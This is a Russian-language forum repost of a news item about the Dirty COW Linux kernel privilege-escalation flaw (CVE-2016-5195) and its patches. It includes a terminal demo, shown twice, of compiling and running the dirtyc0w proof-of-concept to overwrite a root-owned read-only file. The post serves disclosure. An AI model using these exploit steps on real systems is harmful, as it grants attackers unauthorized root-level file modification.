В ядре Linux обнаружена опасная 0-day уязвимость Dirty COW (CVE-2016-5195)

MaN1aK_inactive40465 · 22 окт 2016

В ядре Linux обнаружена опасная уязвимость, которая связана с обработкой подсистемой памяти ядра механизма copy-on-write (COW). Эксплуатируя баг можно спровоцировать так называемое состояние гонки (race condition). При эксплуатации уязвимости неавторизованный локальный пользователь сможет получить доступ к memory mappings с правом записи, хотя доступ должен быть ограничивать только чтением (read-only). Уязвимость относится к privilege escalation.
эксплуатируется злоумышленниками.

В четверг, 20 октября, один из ключевых разработчиков ядра Linux Грег Кроа-Хартман (Greg Kroah-Hartman) сообщил о выходе обновлений для версий Linux 4.8, 4.7 и 4.4 LTS, исправляющих уязвимость Dirty COW.

Уязвимость вызвана состоянием гонки при обработке copy-on-write (COW) операций в подсистеме управления памятью и позволяет нарушить работу маппинга памяти в режиме только для чтения. С практической стороны, проблема позволяет осуществить запись в области памяти, отражённые в режиме только для чтения. Например, в прототипе эксплоита показано как использовать данную проблему для изменения содержимого файла, принадлежащего пользователю root и доступного только на чтение. В том числе, при помощи предложенного метода атаки непривилегированный злоумышленник может изменить исполняемые системные файлы, обойдя штатные механизмы управления доступом.
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test

$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000

$ cat foo
m00000000000000000

Код
 $ sudo -s

   # echo this is not a test > foo

   # chmod 0404 foo

   $ ls -lah foo

   -r-----r-- 1 root root 19 Oct 20 15:23 foo

   $ cat foo

   this is not a test



   $ gcc -lpthread dirtyc0w.c -o dirtyc0w

   $ ./dirtyc0w foo m00000000000000000

   mmap 56123000

   madvise 0

   procselfmem 1800000000



   $ cat foo

   m00000000000000000
Для проверки уязвимости доступен Proof-of-Concept эксплоит: клик.

(c) хабр

Где купить аккаунт

Кто сейчас скупает рекламу в профиле?

Я сдохну в этой адской дыре

Ты чё мразь

Играл в кс и....

Ребят у меня вопрос

Думаю сменить ник

Спортики ищут меня

Топ 3 смерти в Ходячие Мертвецы

Подарок на др?

Вот они выпускники

А чё будет если это съесть?

Слив нового альбома МОРГЕНШТЕРНА морген што штерн моргеншпека

Дополнение к темке с колпачками

Спасибо

Откуда такая агрессия

Не набрал порог по Обществу, возьмут ли на платку в вуз??

Это он

Чувак

Я такой богатый

Грейпфрут

Ищу чувачка который исправит код на python

Бля а если ...

Где можно купить накрутку запусков бота?

Долбит как веб 2.0

Это чё за фигня

Кто хочет обменяться?

В какие плейсы сейчас выгодно ставить ботов роблокс?

Нас потом гранатой взорвали

Ого новое меню

В ядре Linux обнаружена опасная 0-day уязвимость Dirty COW (CVE-2016-5195)